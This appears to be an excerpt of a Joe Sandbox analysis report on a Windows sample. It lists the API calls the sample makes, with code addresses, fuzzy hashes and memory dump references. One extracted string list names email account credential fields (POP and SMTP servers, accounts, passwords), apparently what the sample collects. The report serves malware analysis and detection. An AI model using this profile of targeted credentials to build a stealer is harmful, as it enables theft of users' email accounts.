                                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                    APIs
                                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Open
                                    • String ID:
                                    • API String ID: 71445658-0
                                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                    APIs
                                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                    APIs
                                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                    APIs
                                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                    APIs
                                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID:
                                    • API String ID: 1174141254-0
                                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                    APIs
                                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                    APIs
                                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                    APIs
                                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                    APIs
                                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                    APIs
                                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0040438F
                                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                    • VariantInit.OLEAUT32(?), ref: 004043C4
                                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                                    • VariantInit.OLEAUT32(?), ref: 00404414
                                    • SysAllocString.OLEAUT32(?), ref: 00404419
                                    • VariantInit.OLEAUT32(?), ref: 00404431
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                                    • String ID:
                                    • API String ID: 1312198159-0
                                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                    • API String ID: 0-2111798378
                                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                    • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                                    • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                    • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                    • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                                    • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                    • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64